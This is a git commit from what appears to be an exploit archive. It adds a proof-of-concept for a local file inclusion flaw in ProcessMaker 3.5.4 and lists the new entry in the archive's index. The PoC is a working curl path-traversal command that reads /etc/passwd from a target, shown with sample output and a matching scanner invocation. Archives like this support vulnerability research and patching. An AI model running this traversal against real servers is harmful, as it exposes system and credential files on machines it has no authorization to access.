DB: 2021-08-27
1 changes to exploits/shellcodes ProcessMaker 3.5.4 - Local File inclusion
This commit is contained in:
parent
0388680649
commit
99acfa06c4
2 changed files with 37 additions and 0 deletions
36
exploits/multiple/webapps/50229.txt
Normal file
36
exploits/multiple/webapps/50229.txt
Normal file
|
@ -0,0 +1,36 @@
|
|||
# Exploit Title: ProcessMaker 3.5.4 - Local File inclusion
|
||||
# Exploit Author: Ai Ho (@j3ssiejjj)
|
||||
# Date: 16-04-2021
|
||||
# Vendor Homepage: https://www.processmaker.com/
|
||||
# Version: ProcessMaker <= 3.5.4
|
||||
# References: https://github.com/jaeles-project/jaeles-signatures/blob/master/common/process-maker-lfi.yaml
|
||||
|
||||
# PoC:
|
||||
|
||||
## With curl
|
||||
|
||||
curl -k --path-as-is 'http://targetIP/../../../..//etc/passwd'
|
||||
|
||||
root:x:0:0:root:/root:/bin/bash
|
||||
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
|
||||
bin:x:2:2:bin:/bin:/usr/sbin/nologin
|
||||
sys:x:3:3:sys:/dev:/usr/sbin/nologin
|
||||
sync:x:4:65534:sync:/bin:/bin/sync
|
||||
games:x:5:60:games:/usr/games:/usr/sbin/nologin
|
||||
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
|
||||
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
|
||||
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
|
||||
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
|
||||
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
|
||||
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
|
||||
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
|
||||
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
|
||||
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
|
||||
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
|
||||
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
|
||||
|
||||
--[snippets]--
|
||||
|
||||
## With Jaeles Scanner
|
||||
|
||||
jaeles scan -s ~/jaeles-signatures/common/process-maker-lfi.yaml -u http://targetIP
|
|
@ -44353,3 +44353,4 @@ id,file,description,date,author,type,platform,port
|
|||
50226,exploits/php/webapps/50226.py,"WordPress Plugin Mail Masta 1.0 - Local File Inclusion (2)",2021-08-25,"Matheus Alexandre",webapps,php,
|
||||
50227,exploits/hardware/webapps/50227.py,"HP OfficeJet 4630/7110 MYM1FN2025AR/2117A - Stored Cross-Site Scripting (XSS)",2021-08-25,"Tyler Butler",webapps,hardware,
|
||||
50228,exploits/php/webapps/50228.py,"Online Leave Management System 1.0 - Arbitrary File Upload to Shell (Unauthenticated)",2021-08-25,"Justin White",webapps,php,
|
||||
50229,exploits/multiple/webapps/50229.txt,"ProcessMaker 3.5.4 - Local File inclusion",2021-08-26,"Ai Ho",webapps,multiple,
|
||||
|
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue